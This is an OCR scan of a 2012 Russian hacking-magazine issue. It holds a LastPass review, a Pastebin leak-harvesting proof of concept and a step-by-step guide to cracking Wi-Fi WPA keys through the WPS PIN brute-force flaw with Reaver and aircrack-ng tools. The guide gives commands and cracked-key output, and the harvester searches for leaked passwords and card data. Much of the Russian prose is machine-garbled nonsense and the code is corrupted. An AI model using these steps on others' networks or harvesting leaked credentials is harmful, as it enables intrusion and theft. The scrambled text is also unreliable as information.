Но $12 на год- отнюдь не такая стрела-змея большая воздаяние следовать

остановился. Очень лаконически опричинах, стоить у

моя персона выбрал его. Во-первых, обслуживание универсален

равным образом работает около всякий ОС

[Windows, Linu x, Мае),

Sign in to Gmaillj\Jith your

зачем было к меня важным критерием. Он имеет плагины с целью всех попик улярны х браузе­

Goug[e Account

траншея [Fiгefox, lnteгne t Ехрlогег, Chгome, Safaгi, Орега). А платным подписчикам [$1 во месяц)

Dl Dl

доступны и версии про церковник улярных

мобильных ОС . Во-вторых,

LastPass

Username: llpuser ::::==========~ ! Password:l••••••••

делает

точный то, аюшки? ото него требуется- автомати­ чески предлагает поберечь танцевальный шаг роли равным образом сведения

форм, а впоследствии подставляет их близ следующем

D

посещении страницы. Е сли аккаунтов для какого-то сайта несколько, так позволительно бурно

Stay signed in 1 Sign in

перескочить со одного получай другой. А коли

J

на какого-то кривого сайта документация автома­ тически неграмотный парсятся, так сие нетрудно наладить

вручную. В-третьих,

LastPass

Can't access \'СUГ acccunt?

храни т зашифро­

ванные танцевальный шаг роли на облаке, бард ому хранилище с жете ролями неграмотный надлежит быть беременным вместе с внешне получи флешке

016

LastPass

работает получи и распишись любых устройствах равным образом ОС

Автоматический вводлаги для равным образом ровня ля с базы

ХАКЕР

LastPass

03/158/ 001 0


Proof-of-Concept СОБРАТЬ ИНТЕРЕСНЫЕ ДАННЫЕ С PASTEBIN.COM И ПОДОБНЫХ СЕРВИСОВ

ХОСТИНГ ТЕКСТА

Такая слава ресурса несложно объ­

Максимально ахнуть безграмотный успеешь равным образом спокойно расшарить лю­

яснима: с головы может поместить для нем

сеча текстовый обложка - такова крест извест­

любые способности заключая помимо регистрации. При

ного онлайн-сервиса PasteЬin . com. Создатели

этом дневник отнюдь не пр оходят дрянный премодера­

изначально рассчитывали, ч так их проектом

ции равно после этого а оказываются во Сети. Моментально.

будут энергетически использовать nрограммисты,

Руководство, конечно, удаляет прот ивозакон ­

которые усилий смогут расходовать в этом

ный контент по части первом у запросу правообла­

ресурсе любые исходники не без; подеветкой синтак­

дателя иначе пострадавшей стороны, хотя для этому

писан бери

Python,

ведь запускается всё с команд­

утнапиштим строки:

python gather.py -k kwords -о urls.db \ -а harvest Ключ 'haгvest' охватывает порядок сбора

данных. Отчеты в отношении найденных данных будут

сиса. И что-то около перво-наперво да было. Н по отношению в чем дело? они аккуратно

времени симпатия сейчас успевает отучнеть согласно Сети.

подаваться сверху упомянутый

никак не могли ожидать, что-то около сие бешеной популярно­

Это , во общем, регесты безвыгодный токмо оборона PasteЬiп .

<< -О >>ис пользуется на выбора файла интересах

сти сервиса у хакеров . Вспомни безвыездно последние

сот, же равным образом ради др угие одной породы сервисы:

вывода . А родничек

истории не без; взломами с Анонимов равно

ключевых слов, держи которые короче откликаться

-почти денно и нощно с целью публикации конфиденци­

Pastie, FгubaгPaste, YouгPaste, Codepad, Slexy и Lodge lt. Идея сегодняшнего РоС- автомати­

альных данных [к примеру, дампов паролейl ис­

ческий накопление «интересных» данных вместе с подобных

пожалуй, самое главн ое . Например, упо­

пользовался прямо PasteЬiп.c om . За примерам

ресурсов. Иными словами, необходимо продать

мянутые сверх сценарии были максимально

издали подвигаться малограмотный нужно. Среди особенно по­

инструмент, обходящий календарь да сообразно некоторым

адаптированы в целях поиска дампов вместе с учеткам

Lulzsec

<<-k>>

e-mail.

Опция

позволяет распатронить базу

граббер . Вообще, настроить кейворды- это,

пулярных держи хлещущий момен т записей [ pasteЬin .

ключевым словам собирающий большую базу

пользователей, логов чата, информации по части кре­

com/tгends l примитивно заметить, ко примеру:

данных «интересного>> контента.

дитных картах равным образом банковских аккаунтов. Список

• дамп каких-то учета для вместе с Fa cebook; • внутреннюю базу данных какого-то

ключевых слов, используемых до умолчанию

взломан­

ного сайта, в томик числе и e-mail'ы пользователей

во

PastyCake, торчмя

скажем, невелик:

Идея, для самом деле , невыгодный новая. В Сети можно найти полно написанных получи и распишись коленке сценари­

равно хеш равно их жете ролей;

СБОР ДАННЫХ

распечатка IР-адр есов из привязкой для конкретным

организациям да компаниям.

ев: так , через malcOde [ Ьit . ly/Aп58Yd l или NeonTempest [ Ьit.ly/zRuК7o l. Но лучшей реа­

DEFAULT_KEYWORDS=[ 'password' , 'hack' ,

лизацией затеи, пожалуй, является схема

PastyCake ото исследователя 0Ь+ [ Ьit. l y/xHXd f H I, de f

readke-fWOrd8 {fЬ&n.:llet:

кой дьявол опубликовал нимало недавно.

"'f7. tu~ [_.r s ;r1p(l for _ l n t hendl e ]

dtiГ

fltch (ltOIIif!, 00\lrCf!l, lritY"//rdl,

se trch_rc"'

l~t'e-UtCh):

N.c:~~~;~ilc( 'I' .]Oln(Ryvo:dsl)

for QC:Iera:.cr,

pt t.Ь

':ittt

s :&tus ,

in

ради верить, во вкусе мысль реализована бери практике.

нате хостингах PasteЬiп .com равно Pastie.oгg равным образом логи­

Дальше всё зависит ото твоей фантазии.

ровать по сию пору записи, используя базу ключевых

s rc:.new_urls{ s to r a~11:):

• ;t ntrttor.~t..,;tttt(path)

слов. Результаты сохраняются на текстовом

! ull_url •IJ1!:!1eracor.!ull ..u:l{Jiath)

файле либо — либо базе данных

print •ts

NtC.Ьtd

SQLite.

В ближайшем

времени кроме того появится подмога

s coraoc . s avc_url(!ull_url, :uec:h.Qroup(l

Н

utch and stoa ..IOoltC:h a l sa

' ' ' t (!ll.ll_u:l,

"'~ 0

MongoDB

равным образом

MySQL.

П оскольку изложение вдоволь

дет Тwittег-ленту PasteЬinleaks l twitteг.com/# ! / PasteЬin l eaks l, идеже его робот-парсер автомати­

еsеr -ш (нчs • 'С!!' ): _Ь..ttend_or_uit lstoraoel: Jtor&\lc.connec~(l

not

нoa.oe.connccttdO:

print

>> :~ys.stde п,

сы, которые эпизодически обходя т контент

таких хостингов равно публикуют интересные К примеру, проработчик Джейм Бл аско ве­

utl-tull_url, dtta'"CI.ata)

Н

РАЗВИТИЕ ИДЕИ Интересно, который во Сети инда глотать целые ресур­

ссылки от соответствующей классификацией.

ь.ц:h.qroup(IJ

L.ltn!:l( 'utch' ,qentator,t~;e:age,:at c h-:uteh.q:cup(),

.ser

Но ажно сего в полном смысле слова достаточно, дабы

Скрипт позволяет изощренно окружать деловой дневник

чески п убликует дневной журнал может статься

"!a1led to open stOrl9f! b•ct'IHid•

lyl.t!l.l~( l l

l"etu rn

s ~ orage

PossiЫe

t l"/1 ер~ • • ..sa rse_op~•!•~ • l e;o;cept IC8J"ror • • е : p1"1nt>>sys.Jtdeн,

sya.e;o;i,t( l ) n~....ord•

PossiЫe listing of http passwords http://pastebin.com/qZbccMB7 PossiЫe Juniper configuration with password http://pastebin.com/9vuwzjnS

-

Н op~s.tvB le:

ke \'Wr:>I'ds • _aad_lteyworda(opt s .ltv!ile l i:I JI 811ft:

keywords •

Massive mail/pass leak

http://pastebin.com/LбYbDlЗб

·opt10Qt!tn~r:

D!fAt!L!_кtYio't!RDS

0ourc•• • ! fasteЫnSource(l,

с. ..·~-~­

fasti e S~;~urce (l

~-----

Oestroy Spyware

Справедливости чтобы игра стоит свеч произносить , что Исходник грабберана

ХАКЕР

03/158/2012

Python

Раздел

«Trending Pastes)) -

сколько качают чаще всего?

на последнее миг апдейты прекратились. ::х:

017


COVERSTORY •

rlal Nc.

01С10С11100003

Туре

01111181~IOIIIQII IIНIMНIIIIIIIIIIIII IW IIII мд, дddre

C oпntct

Р IN-код уж потен ц иально п одвержен ата­

to il Nttwork

ке как bгutefoгce. Н насчёт сие только лишь цве т очки.

the network security key

УЯЗВИМОСТЬ

~( Шit'jkty:

'

COC1C0500D55 ,• • • • • 01111 0111111 ( ;;, 0484-0~

Как автор этих строк уж заметил ранее, РIN-код состоит

Е] Hidt не без; lш<~сtш

Y o~r

c;1n :~l so conr1tct bLrttor1 011 tlн• ro~•tt r .

с восьми цифр - следовательно, существует Ьу p щl1rr1g

00л81100

tl1t

так сократить. Д ело во том, что-нибудь впоследствии д няя число

="--"-.:==~ РI N - ко од

Лоrо ти пWРS

Ри не без; ун в отношении для

WPS

0. РIN-код WPS, начерканный

ок

возьми корпусе раутера

000 000 0вариантов в целях подбора. Од ­

нако наличность вариантов не возбраняется существен ­

Рисунок

0.

Окн по части дл пишущий эти строки во вод а Р IN-кода

~

РI N-кода представляет собою некую контролирование ­ ную сумму, которая высчитывается для осно­

вании семи первых цифр. В итоге получаем

WPS

сейчас

0ол711 касательно 000 0001 вариантов. Н касательно равным образом ЭТО до сей времени

невыгодный все! Далее во н имательно смотрим бери устрой­

ЦЕНА УПРОЩЕНИЙ Открытых точек доступа, для которым вместе

lхардварнуюl равным образом для компьютере lсофтварнуюl,

ство протокола аутентификации WPS !рисунок 31. Такое ощущение, что-то е г что касается специал ь так про­

отнюдь не необходимо вставлять клавиша на подключения,

тем самым активируя суд настройки.

ектировали, ч т обы покончить осуществимость чтобы

становится по сию пору дешевле да меньше. Кажется, что-то

Нам сие неинтересно.

брутфорса. Оказывается, ревизия РIN-кода

Ввод РIN-кода во веб-интерфейсе. Пользо­

осущес т вляется на неуд этапа. Он делится сверху двум

нажимаетспециальную кнопку в раутере

быстро их допускается хорош засыпать во Красную книгу.

0.

Если прежде куверта был способным ажно равным образом никак не знать, ась?

ватель заходит чрез бgаузер во админи­

равные части, да каждая кусок проверяется от­

беспроводную силок не возбраняется сложить ключом,

стративны й интерфейс раутера да вводит

дельно! Посмотрим в схему :

обезопасив себя через посторонних подключе­

вслед за тем РIN-код изо восьми цифр, начерченный

0.

ний, в таком случае в эту пору ему однако чаще подсказывают

сверху корпусе у стройства !рисунок

об экий возможности. Взять пускай бы бы кастомные

чегопроисходитпроцесс настройки. Этот

прошивки, которые выпускают ведущие про­

приём к лицу живей с целью перваначаль­

вайдеры к популярных моделей роутеров,

утнапиштим конфигурации роутера, следственно наш брат его

дай тебе опростить настройку. Нужно обозначить двум

рассматриватьтоже далеко не будем .

вещи- логин/па предназначение равно ... разъяснение ради защиты

01, впоследствии

Е сли за касательно т сылки сведения М4 атакую­ щий получил во возражение

EAP-NACK, в таком случае симпатия

может

существовать уверен, что-нибудь первая ч асть РIN-кода неправильная.

0.

Е сли а некто по мнению л учи л

EAP- NACK п осле от­

сылки М6, то, соотве т ственно, вторая пай

Ввод РIN-кода сверху компьютере пользовате­

РIN-ко д а малограмотный во ерна. П олучаем 0 0л411 О

беспроводный сети. Что до этих пор больше важно,

ля !рисунок 01 . При соединении не без; раутером

вариантов к первой полови н ы равным образом 00лз 01

самочки производи т ели оборудования стараются

позволено раскрыть специальную сессию

свершить течение настройки незамыслова т ым.

во рамках которой настроить роутер иначе

0001 для того второй. В итоге имеем только л ишь 11 000 разное н так на интересах паркет н относительно г что касается п еребора .

Большинство современных раутеров поддер­

получитьуже имеющиеся настройки, когда

Чтобы вернее понять, наравне сие буд е т работать,

живают пушнина н направление

точно определить

WPS IWi-Fi Pгotected Setupl.

З.

Pl N - код.

WPS,

Вот сие сейчас п ри­

0001

посмо т ри нате схему .

С его через пользовател ь следовать считанные

влекательно.

секунды может настроить безопасную беспро­

Для открытия подобной сессии неграмотный нуж -

перебора. Она об г ра н равно ч ена скорост ь ю обра ­

водную сеть, общий отнюдь не забивая себя голову

получай никакая аутентификация. Это может

ботки рау т ером W РS - вслед п росов: что до д ни в таком случае ч ки

тем, что-нибудь «где-то единаче нужно вобрать шифро ­

совершить каждый желающий! Получается, аюшки?

досту п а будут на ыд а во а т ь резул ьт ат каждую

0.

Важный моме нт - возмож н ая ско р отросток

вание равным образом вмазать WРА - ключ». Ввел во системе восьмизначный символьный

PIN,

какой

написан получи и распишись роу т ере, - равным образом готово' И видишь в этом месте

IEEE 002.11

держись крепче. В декабре зараз двойка иссле­

0upplicant--+ АР

Aut hent ication Requ es t

Э т по отношению во вкусе

0upplicant - А Р

Authentication Response

чернявый шаг интересах любого роутера. Оказалось,

0upplicant--+ АР

Association Request

0upplica nt - А Р

Association

дова т еля рассказали касательно серьезных фундамен­

тальных прорехах во протоко л е

WPS.

зачем ежели на точке доступа активирован

WPS !ко­

торый, н а минуточку, вклю ч ен во большинстве

раутеров согласно умолчанию!, в таком случае поджать PIN для подклю~ения да извлечь родничек для того подключе­

WPS?

Задумка создателей

WPS

хороша. Механизм

механически вслед за д ае т кличка яма равно шифрование.

Таким образом, п ользова т елю малограмотный т н еобходи­

002.11 Association

IEEE 002.11/ЕАР

ния мож.но ради считанные часы! КАК РАБОТАЕТ

Respo пse

002.11 Authentication

0upplicant --+ АР

EAPO L·5tar t

0upplica nt - А Р

EAP-Req uest ldentity

0upplicant ..... АР

EAP·Response ldenti ty (ldenti ty: "WFA-5impleConfig-Regi stra r-1 · 0')

ЕА Р

lnit iation

IEEE 002. 0 0/ЕАР Expanded Туре, Vendo r ID: WFA (Ох372А), Vendor Туре: SimpleConfig (Ох01)

мости вваливаться на веб - интерфейс да кумекать

М1

En rollee ..... Re gist ra r

N1 01 Description 01 РКЕ

со сложными нас т ройками . А ко сделано настро­

М2

Enrollee- Regi strar

N1 01 N2l l Description 01 РК моя особа 01 Authenti cator

мз

En rollee ..... Regis t rar

N2ll E·Hash1 01 E·H ash2l l Authe nt icator

М4

Enrollee - Registra r

MS

En rollee ..... Reg istrar

N 0 01 R-Hash 0 01 R-Ha sh2 01Eкevw,.oк.v(R-5 0) 01 Authenticator N2ll Екеуw,.рке/Е-51 ) II Authenticator

Мб

Enrollee - Registrar

N1 01 Екеуw,.рк.у( R-52) II Authentica t or

proove posession of 0' half of PI N

М7

En rollee ..... Reg ist ra r

N2ll Екеуw,.рк.у( Е-52 IIConfig Data) 01 Authent icator

proove posession of 0' half of PIN,

мв

Enrollee - Reg istrar

N1 01 Eкeywrapкey(Con figData) 01 Authenticator

send АР configuratio n set AP configuration

енной яма мож н что касается без участия п роблем добави т ь

что попало построение !например, ноу т букl: если правильно внедрить

PIN,

в таком случае дьявол полу ч ит целое необ­

ходимые настройки. Это жуть удобно, почему

однако крупные игроки держи рынке ICisco/ L iпksys, Netgeaг, 0- L iпk, B elkiп, Bu ffalo, ZyX ELI сейчас пре д лагают беспрово д ные раутеры не без; соответственно дд ерж­ кой

WPS.

Разберемся крохотку за д робнее.

Существует три варианта испо л ьзования

WPS: 1. Push-Buttoп - Coппect IPBC I. П ользователь

020

Рису н что касается для З . Прото для ол аутентифи для аци равным образом

Diffie·Heltman

Кеу

Exchange

proove posession of 05 ha lf of PIN proove posession of 0st hatf of PI N

WPS

ХАКЕР

03/158/2012


В зломать

HOWTO:

Осно вн ое минута п ри этом затра ч ивается

<.. . > trying 08674095

нарасчетотк р ы т насчёт г оклю ч апоалгоритму

PIN

Д иффи - Хеллмана, симпатия д олже н бы т ь сгенери­

<.. . > Networ k Кеу: reall y_re ally_lon g_wpa_p assphr ase_good_ luck_crack i ng_t his_one <.. . >

секун д у, д ругие- каж д ые десят ь секун д .

рова н п е р е д резьба ом МЗ. З атра че н ное получи и распишись зто время мож н в отношении у м е н ь обшивать , вас б р ав н а сторо н е клиента без затей сек р ет н ый ко л юч, который в д альнейurем упрос т равно т р асчеты других

Wi- Fi

после

ч асо во

# f ound 0st half of

ключей . П рактика показы на ает, чтод л я ус п е шн по части г по части р езульт а т а обы чн насчёт д ос т а т оч н в рассуждении

Как видишь, попервоначалу была nодоб р ана

п еребрать лиш ь п оло на ину всех вариантов,

первая nоловина РIN-кода, после - во т орая,

да на среднем брутфорс занимает общей сложности отче ­

равным образом на конце концов план выдала в готовности

т ыр ех д насчёт д еся т да часов.

для использованию треншальтер для того подключения

ко беспроволочный сети. Сложно п ре д из т а на да т ь,

ПЕРВАЯ РЕАЛИЗАЦИЯ

сколько стоит времени потребовалось бы, так чтобы

Первой появившейся реализацией брутфорса

приискать клавиша такого типа длины [61 символ)

стала обслуживающая программа wpsc г ack

доселе существовавшими инструментами.

[goo.gl/9wABj l, нате ­

писа нна аз многогрешный иссле д относительно во ателем Стефа н ом Фибё ­

В п р очем, wpscгack невыгодный единственная обслуживающая программа

кусок бери моя особа зыке

интересах эксплуа т ации уязвимости, равным образом сие будет

Pytho n. Ут илита

исnользовала

библиотеку 0сару, п вал на оляю щ ую конструиро­

уморительный момент: во так но само~ минута по-над

вать п р оиз во ольн ы е сетевые пакеты. Сценарий

праздник но самой проблемой работал равным образом непохожий

мож н что касается вслед п усик т ит ь т олько п что до д L in u х-системой,

исс л едователь- Крейг Хеффнер иэ компании

п ре д на а ри т ельно nе р еве д моя персона нечистая сила п роводной

Tactical

интерфейс во работа мониторинга. В качес т ве

появился впахивающий РоС ради реализа-

параметров необхо д имо указа т ь титул сетевого

ции атаки, некто опубликовал свою у т илиту

интерфейса на сис т еме , МАС - а др нашел искуситель п ро­

Reaveг lc o de . g o ogle .co m / p /гea v eг- w ps l. Она

вот дн по части г касательно адаn тер а , а т акже МАС - а др есть так ч ки

н е лишь только автоматизирует дело п по отношению д бора

доступа равно ее обозначение

WP5 - PIN

[551 01.

N etwoгk

0olutions.

Инкремент~уем

0 дробь PIN

·~·

nepecчиtloiВ88U

контра~ьную сумму

Увидев, ась? на Сети

равным образом извлекает Р5К - ключ, однако равным образом пред­

ла г ает большее величина настроек, с тем

$ ./wpscrack .py --iface mon0 \

атаку не грех было материализовать для т ив самых

--client 04:0с:бd:88 : 00 : 0 0 \ - -bssid f4:ec:38: cf :00:00 --ssi d t est ap - v sniffer st arted trying 00000000 attempt took 0.95 seconds try ing 00010009 < ... > try ing 08660005 attempt too k 0.08 se conds try ing 08670004 # found 0st half of

единожды н ых рау т е ров. К тому а что касается н а п относительно дд ержи на ает

Рисунок

0. Блок - не без; х ема

брутфорса РIN-кода

WPS

на одных усишко т ройств. Поз т ому ис п ользовать мы будем вот поэтому и есть его. Шаг О. Готовим систему

нам н ого большее величина беспроводных

На официальном ущелье т е B ackTгack

адаптеров. Мы решили позаимствовать ее следовать основу

ступен пользу кого загрузки на виде виртуал ь утнапиштим

да во всех подробностях описать, равно как правонарушитель

механизмы лещадь VMwa г e равно загрузочного образа

может пустить в дело уязвимост ь во насчет т околе

050.

WP5 пользу кого

несложно записат ь об р я возьми болва н ку, а мож н касательно

подключения для из-за щ равно щ ен н ой бес­

д о­

Рекомен д ую п ос л е д ни й на ари а нт . Мож н в отношении

со через программы

проводной сети.

0 R1

UNetbooti n [ uпetboot i n.

souгcefoгge . net l со д е л ать загрузо чн ую фле ш ку:

i:I•NIIel

где-то тож ина ч е, следовать г рузив ш ис ь вместе с т ако г касательно носи ­

К а ко да ради первый встречный другой породы атаки нате нечистая сила п ровод ­

теля, да мы со тобой помимо л равным образом ш них заморачек моментально буд ем

ную сеть, нам понадобится

заключать систему, готовую ко работе.

Linux.

Ту т необходимо

PIN

сказать, что такое? Reaveг присутствует во репазито­

attempt too k 0.09 se cond s t ry ing 08670011 att empt t ook 0.08 second s

ри равно всеми известного дистрибутива B ackTгack

Шаг

[ backtгack- li nux.oгg l , на котором ко тому а сделано

Л огин да п араль дл автор вхо д а согласно умо лча нию ­

на клю ч ены необходимые драйвера интересах беспро -

0. Вход

на систему

гооt:tоо г. О каз а вшись во консо л и, не грех сме л в отношении

старто на а ть иксы [ест ь отдель н ые вместе с борки B ackTгack - во вкусе от

GNOME, т ак да от К ОЕ) :

# st art x

ЭКСПРЕСС-КУРС ПО ВЗЛОМУ WI-FI

Шаг

0. Установка

Reaveг

Чт обы загр узи ть R eav eг, нам п в отношении надо об ит из автор

0. WEP (Wiгed Equivalent Pгivacyl

выманивать клавиша ради вслед для рытой WPA/WPA2 козни [да

равно н тер н ет. П оэ т ому п по отношению д ко л ю ч аем пат чко рд

Самая первая методика ради защиты бес­

да ведь до невероятия около наличии дампа круглым счетом

тож настраи на аем демон оборона изумительный д утнапиштим а д а пт ер

проводной тенета оказалась здорово слабой.

называемого

[Applications ~ l nte гn et 0 Wicd N e t wo г k

Взломать ее можн насчёт просто вслед мало-мальски

ется во глицерид возле подключении клиента ко точке

минут, используя слабости применяемого во ней

доступа) . Брутфорс может затянуться в дни,

ми н ала, гд е загружаем п ос л е днюю на е р си ю

шифра

месяцы да годы . Для увеличения эффективно­

у т иначе т ы ч ерез р е п озиторий :

RC4. Основными

инструментами на этом месте

WPA

Haпdshake, для оторый переда ­

служат снифер aiгodump-пg с целью сбора шаг кетов

сти перебора сперва использовались специа­

равно обслуживающая программа aiгcгack-ng, используемая непосред­

лизированные словари, после были сгенери­

ственно ради взлома ключа. Также существует

рованы радужные таблицы, в дальнейшем появились

специальная тулза wesside-пg, которая заключая

утилиты, задействовавшие те х нологии

взламывает целое близлежащие точки из

CUDA

WEP

равно

ATI

# apt - get update # apt-get install rea ve r

NVIDIA

0tгeam интересах аппаратного ускорения

Тут получи и распишись д насчёт сказат ь , ч т насчёт во ре п ази т а р ии н а­ хо д равным образом тся на е р эта

0. WPA/WPA2 (Wiгeless Pгotected Access)

GPU. Используемые инстру ­ менты- аiгсгасk-пg (брутфорс по мнению словарю), cowpatty [с в области м ощью раду ж ны х т а блиц) , pyгit

Перебор-это одинарный образ подо-

[с исполь з ова н ие м во равно део для артыl .

рекомен д американский рубль т обновит ь ся накануне максимал ь же

на автоматическом режиме .

ХАКЕР

03 /158/ 0012

процессаза вычисление

Man age г l . Дал ее з ап ускаем эмулят касательно р тер ­

0.3,

ко т орая ли чн что до у ме ня

зар а ибо т а ла н е пр ави льн о. П оиска на ан ф касательно р м а ­ цию по отношению проблеме, автор этих строк держи ш ел место а вт ора, некоторый

021


COVERSTORY возможной версии, скомnилировав исход­

ники, взятые с

SVN.

Эта главенство создает условный интер­

Это, во общем, самый

фейс во режиме мониторинга, его названьице

у нивер са льный вместе с n особ уст ановки ( на любого

короче подмеченно во выводе команды (обычно это monOI . Теnерь нам приходится обнаружить точку достуnа

дистриб утива !.

ради а та ки равным образом проведать её

BSSID . Восnользуемся

у ти мясеный интересах nрослушки лукавый n ро во в отношении дн ого эфира

$ svn checkout http ://reaver-wps. googlecode .com/sv n/ trunk / reaver-wps $ cd ./reave r-wps / src / $ . /configure $ make # make install

aiгodump-ng:

# airodump-ng mon0 На экране nоявится сnисок точек достуnа

Рисунок

0. Reaver Pro- автомобиль с создателей Reaver

во радиусе досягаемости. Нас интересуют точки Никаких проблем со сборкой nод BackTгack не хорошенького понемножку - nроверено прямо . В дистрибутиве Агсh

Linu x,

ко торы м nользуюсь я, прибор

не без; шифрованием

# reaver -i mon0

в соответствии с ключу

WPA/WPA2 равным образом аутентификацией PSK. Лучше предпочитать одну с nер­

-vv

00:21:29:74:67:50

вых во сnиске, эдак наравне ради nроведения атаки

Ключ

содержит расклешенный последовательность

nроизводится равным образом того nр касательно ще , по причине нали­

желательна хорошая складность вместе с точкой. Если точек

чию соотве т от тв ую щего

числа да сnисок далеко не умещается сверху экране, в таком случае мож­

nрограммы, дабы наша сестра могли убедиться, который безвыездно

а восnользоваться второй извест н ой утилитой

работает как бы должно .

PKGBUILD'a:

вслед за тем интерфейс больше nрисnособлен

- kismet,

$ yaourt -5 reaver-wps-svn

на этом nлане. Оnционально _можно в месте nро­ Шаг

0.

Подготовка ко брутфорсу

верить, включен ли нате нашей точке прибор

WPS. Для сего во комnлекте не без; Reaveг (но только если заимствовать его с SVNI так тому и быть обслуживающая программа wash :

Для исnользования Reaveг нельзя не nро­ делать следующие вещи:

nеревести бесnрово днище й а даnте р на работа

# ./wash -i mon0

мониторинга;

прознать отчество бесnроводно г что до интерфейса;

• • •

определить МАС-а дрес т лорнет д остуnа (BSS IDI; убедиться, который получай т очке активирован

В качестве nараметра задается имя интерфейса, nереведенного во система мони­

WPS.

торинга. Также не возбраняется исnользовать оnцию

интерфейс вместе nрисутств условные единицы т на системе:

наnример, тем а aiгodump-ng. По неnонятной

# iwconfig

ляет PIN'ы точке д остуnа, значит, весь завелось

ли утилиту

хорошо, равно остается туnо ж наградить . Пр оцесс может

wash.

Будем надеяться, для моменту

nубликации статьи эту ошибку исnравят.

затянуться. Самое короткое время, следовать которое

Шаг

nримерно nять часов. Как только лишь спирт буд ет nо­

ми посчастливилось сбрутфорсить

wlanOI- значит,

0. Запускаем

брутфорс

строй расnознала адаnтер !если некто nодклю­

Теnерь дозволено nристуnать неnосредственно

чалея для бесnрово дн ой сети, с целью нагрузить

ко nеребору

nростом случае нужно немного. Необходимо

П ере во е д ем адаnтер во распорядок мониторинга:

чуть показать титул интерфейса (nереведенного

# airmon-ng start wlan0

точки достуnа:

нами перед этим во система мониторинга! равно BSSIO

00:21·29:74:67:50

-с б

Reaver v1.~ W1F1 Protected Setup Attac~ Tool Copyrtght (CI 0011, Tact1cal Network Solutions. Cra1g Heffner

0-1

~att1ng

[-]

S~I!Chtng ~onO

l1nksys -d 05 -vv

Рисунок

00:21:29.74:67:50

0

022

0. Пример работы

WPA-PSK,

тот или иной вмиг но не возбраняется ис­

МОЖНО ЛИ ЗАЩИТИТЬСЯ? сnособом- отключить нафиг

Wa1t1ng for beacon from 00:21:29:74:67:50 Sw1tch1ng monO to channel б Assoctзted w1th 00:21:29·7J·67:SB (ESSID: l1nksysl Trv1na p1n 04637129 Кеу cracked 0n 0 seconds WPS PIN: '64637129' ~РА PSK· MyHOrseTh1nkSYouStolЗH1sCarrot • -1 АР SSID: l1nksys

0

родник

Защититься ото атаки позволяется nо ка в отношении дн им

б

l1nksys --p1n 04637129 -vv

Reaver v1.~ W1F1 Protected Setup Attack Tool Copyr1ght lcl 0011, Tact1cal Net~ork Solutions, Cra1g Heffner ccheffnerJtacnetsol.com>

•1 ·1 •1 •1 ·1 •l -1

[+] Trying pin 04637129 [+] Кеу cracked in 03654 seconds [ +] WPS PIN: '64637129' [+] WPA PSK: 'MyH0r seThink$You5tol3HisCa rrot!' [+] АР SSID: 'linksys'

что такое? аж далеко не укладывается на голове.

·с

добран, nрограмма с настроением об этом сообщит:

nользовать чтобы nодключения. В се та для nросто,

[-] т~-y1r1g р111 01889978 [' 0 WARNING· Rece1ve t1meout occurred ~onO

составило

Самое ценное здесь- э т о, естественно же, ccheffner~tacnetsol.com>

•or beacon from 00:21·29·7J:67:50 to channel б 1·1 Assoc1зted w1th 00.21:29.74.67:50 0ESSID: 01nksys) !·1 Trv1ng p1n 03979978

reaver -1

PIN,

PIN'a. Для старта Reaveг во самом

Reaveг, ведь скорее о выдергивать nод ключение!.

~onO

Если nрограмма n ос ледок насчёт вательн об отnрав­

nричине на nакет Reaveг на BackTгack никак не включи ­

Е сли во выводе э пирушка команды глотать интер­

reaver -1

Reaver v1 .4 WiFi Protected Setup Attac k Tool Copyright (с) 0011, Tactical Network Solutions, Craig Heffner <c heffner@ tacnetsol .com> [+] Waiting for beacon from 00:21:29:74:67:50 [+] Associated with 00:21:29:74:67:50 ( ESSID : linksys) [+] Trying pi n 03979978

'-f' равным образом скормить утилите сар-файл, созданный,

Для альфа и омега nроверим, что такое? бесnроводной

фейс не без; оnисанием (обычно сие

"-vv"

WPS

на настрой­

ках роутера. Правда , в духе оказалось, не без; д е лат ь э т в отношении как ми видится дале ко невыгодный ввек . П оско л ьку уязвимость су щ ествуе т невыгодный бери уровне реализа­ ции , а нате уров неграмотный nротокола, у моря погоды с nроиз­

водителей резво г что до nатча, ко торый решил бы все nроблемы, невыгодный стоит. Самое большее, что они могут в тот же миг со д елать, - сие сентенция льн о nротиводействовать брутфорсу. Наnример, если блокиро ват ь

WPS

получай единолично период nосле nяти

неудачных nоnыток ввода РIN- ко правда , так nеребор займет ранее почти

00 дней.

Но видоизмененный во оnрос,

сколько души допускается налететь ёбаный патч

получи и распишись богатство устройст на , ко т орые работают брутфорса

Reaver

сообразно всему миру? :х:

ХАКЕР

03/158/201 0


HOWTO:

Взломать

Wi-Fi

ради

00

часов

FAQ r;t

a.l

n

Какой беспроволочный звукосниматель нужен

был поврежден до пути. д смотри пользу кого атаки

литы

на взлома?

держи

находится во списке .

WP5

должен строгое руководствование

wash:

запусти её да проверь, который твоя намерение

Перед тем наравне экспериментировать,

протоколу передачи движение кетов в среде точкой

Почему аз многогрешный неграмотный могу соотноситься

нужно убедиться, что-нибудь беспроволочный

доступа равным образом Reaveг в целях проверки каждого

от точкой доступа?

плата может нести протоколы и заботы во режиме монито­

РIN-кода . Если быть этом какой-то программа

Это может взяться по вине плохого уровня

ринга . Лучший способ- свериться со спи­

потеряется, либо придет на непотребном

ском поддерживаемого оборудования

виде , ведь придется вновь назначать

08.1

сигнала иначе говоря потому, аюшки? твой адаптер непригоден интересах подобных изысканий.

держи сайте проекта Аiгсгасk-пg ( Ьit.ly/wifi

WР5-сессию. Это делает атаки возьми

adapteг list l. Если а встанет спрос в рассуждении том,

значительно сильнее зависимыми с уровня

какой-нибудь беспроводный устройство купить, ведь

сигнала. Важно помнить, сколько коли твой

сынициировать дозволено не без; любого адаптера сверху чипсете

беспроволочный преобразователь видит точку доступа ,

RTL8187L . U5В'шные донглы нетрудно найти винтернетеза $20.

WP5

r;1

"гаtе limiting detected"?

в таком случае сие ещё далеко не значит, который равно пятнышко доступа

081

доступа заблокировала WP5 . Обычно

видит тебя . Так ась? разве твоя милость являешься

сие временная блокировка (около пяти минут!, хотя на некоторых случаях могут влепить равно методический ба н (разблокировка

n

счастливым обладателем высокомощного

0':'1 ~

n

Почему у меня возникают ошибки

адаптера ото

"timeout"

получай пару десятков

да "out of огdег"?

Обычно сие происходит по вине низкого

уровня сигнала да бузовый взаимоотношения от точкой

08.1

доступа. Кроме того, пятнышко доступа может

Netwoгk равным образом антенl!ы

ALFA

dBi , так

исключительно помощью административную панельl .

далеко не надейся , что-то

получится перевернуть безвыездно пойманные точки

Есть одиночный тягостный ба г во Reaveг версии

доступа .

0.3,

с подачи которого неграмотный определяются снятия

подобных блокировок . В качестве варюра­ Почему у меня безграмотный работает спуфинг

унда предлагают проэксплуатировать опцию

a.l

